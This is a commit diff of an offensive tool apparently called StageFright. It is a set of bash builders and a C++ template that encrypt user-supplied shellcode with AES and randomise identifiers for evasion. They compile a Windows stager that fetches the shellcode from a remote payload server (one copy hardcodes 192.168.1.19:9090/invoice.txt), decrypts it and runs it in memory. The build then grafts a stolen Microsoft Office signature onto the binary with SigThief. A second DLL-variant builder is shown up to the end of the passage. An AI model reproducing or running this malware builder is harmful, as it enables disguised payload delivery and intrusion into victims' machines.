Add files via upload

StageFright/StageFright/StageFright/HTTP/HTTP.sh

@@ -0,0 +1,181 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+ _____ _                       _   _   _ _____ ___________ 
+/  ___| |                     | | | | | |_   _|_   _| ___ \
+\ `--.| |_ __ _  __ _  ___  __| | | |_| | | |   | | | |_/ /
+ `--. \ __/ _` |/ _` |/ _ \/ _` | |  _  | | |   | | |  __/ 
+/\__/ / || (_| | (_| |  __/ (_| | | | | | | |   | | | |    
+\____/ \__\__,_|\__, |\___|\__,_| \_| |_/ \_/   \_/ \_|    
+                 __/ |                                     
+                |___/                                      
+ _____                    _        _     _                 
+|  ___|                  | |      | |   | |                
+| |____  _____  ___ _   _| |_ __ _| |__ | | ___            
+|  __\ \/ / _ \/ __| | | | __/ _` | '_ \| |/ _ \           
+| |___>  <  __/ (__| |_| | || (_| | |_) | |  __/           
+\____/_/\_\___|\___|\__,_|\__\__,_|_.__/|_|\___|           
+                                                           
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP Of Your Payload Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"Enter The Port Of Your Payload Server"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/HTTP/template.cpp StageFright/HTTP/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/HTTP/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/HTTP/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/HTTP/conv.py StageFright/HTTP/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/HTTP/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/HTTP/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/HTTP/Resources/con.py
+sed -i "s/;//g" -i StageFright/HTTP/Resources/con.py
+python3 StageFright/HTTP/Resources/con.py
+#rm StageFright/HTTP/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/HTTP/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/HTTP/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/HTTP/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/HTTP/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/HTTP/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/HTTP/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/HTTP/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/HTTP/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/HTTP/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/HTTP/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/HTTP/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/HTTP/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/HTTP/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/HTTP/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/HTTP/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/HTTP/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/HTTP/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/HTTP/Resources/template.cpp -Wno-narrowing -fpermissive -lws2_32 -lntdll -lwininet -O2 >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+

StageFright/StageFright/StageFright/HTTP/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/HTTP/Resources/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL TxZsIgHLMj(LPCWSTR szUrl, PBYTE* SGTVVskiX, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *SGTVVskiX = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int RXWUKYjHiBac(char* difern, unsigned int difern_len, char* SDtXZSWsy, size_t SDtXZSWsylen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)SDtXZSWsy, (DWORD)SDtXZSWsylen, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char SDtXZSWsy[] =  { 0xa1, 0xc6, 0xd8, 0x17, 0x54, 0xe2, 0x8f, 0x64, 0x42, 0xe8, 0xac, 0x80, 0x91, 0xa7, 0x21, 0xe0 };
+
+int main() {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://192.168.1.19:9090/invoice.txt";  // Replace with your actual URL
+
+    PBYTE SGTVVskiX;
+    SIZE_T SGTVVskiXSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!TxZsIgHLMj(szUrl, &SGTVVskiX, &SGTVVskiXSize)) {
+        printf("[!] TxZsIgHLMj Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    RXWUKYjHiBac((char*)SGTVVskiX, SGTVVskiXSize, SDtXZSWsy, sizeof(SDtXZSWsy));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = SGTVVskiXSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, SGTVVskiX, SGTVVskiXSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+

StageFright/StageFright/StageFright/HTTP/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/HTTP/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL Random3(LPCWSTR szUrl, PBYTE* RandomB, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *RandomB = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int Random1(char* difern, unsigned int difern_len, char* Random2, size_t Random2len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)Random2, (DWORD)Random2len, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random2[] = KEYVALUE
+
+int main() {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://HOSTIP:PORTY/SHELLCODEFILE";  // Replace with your actual URL
+
+    PBYTE RandomB;
+    SIZE_T RandomBSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!Random3(szUrl, &RandomB, &RandomBSize)) {
+        printf("[!] Random3 Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    Random1((char*)RandomB, RandomBSize, Random2, sizeof(Random2));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = RandomBSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, RandomB, RandomBSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+

StageFright/StageFright/StageFright/HTTPDLL/HTTPDLL.sh

@@ -0,0 +1,186 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+ _____ _                       _   _   _ _____ ___________ 
+/  ___| |                     | | | | | |_   _|_   _| ___ \
+\ `--.| |_ __ _  __ _  ___  __| | | |_| | | |   | | | |_/ /
+ `--. \ __/ _` |/ _` |/ _ \/ _` | |  _  | | |   | | |  __/ 
+/\__/ / || (_| | (_| |  __/ (_| | | | | | | |   | | | |    
+\____/ \__\__,_|\__, |\___|\__,_| \_| |_/ \_/   \_/ \_|    
+                 __/ |                                     
+                |___/                                                  
+______ _      _                                            
+|  _  \ |    | |                                           
+| | | | |    | |                                           
+| | | | |    | |                                           
+| |/ /| |____| |____                                       
+|___/ \_____/\_____/      
+                                                           
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP Of Your Payload Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"Enter The Port Of Your Payload Server"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your EntryPoint. ex: Go"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/HTTPDLL/template.cpp StageFright/HTTPDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/HTTPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/HTTPDLL/conv.py StageFright/HTTPDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/HTTPDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/HTTPDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/HTTPDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/HTTPDLL/Resources/con.py
+python3 StageFright/HTTPDLL/Resources/con.py
+#rm StageFright/HTTPDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/HTTPDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/HTTPDLL/Resources/template.cpp
+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/HTTPDLL/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/HTTPDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/HTTPDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/HTTPDLL/Resources/template.cpp
+
